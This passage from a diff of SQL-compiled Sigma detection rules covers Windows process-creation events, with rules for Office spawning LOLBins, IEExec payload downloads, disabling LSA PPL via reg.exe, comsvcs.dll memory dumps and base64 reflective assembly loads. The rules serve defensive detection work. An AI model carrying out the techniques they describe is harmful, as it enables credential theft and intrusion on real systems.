NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate testing of Microsoft UI parts." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' 
ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": 
"4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the IEExec utility to download payloads", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.exfiltration" - ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1562.010" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel 
= 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", - "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - 
"Unlikely, because no one should dump the process memory in that way" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE 
'%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Google Drive", + "Citrix" ], "level": "medium", "rule": [ - "SELECT 
* FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or 
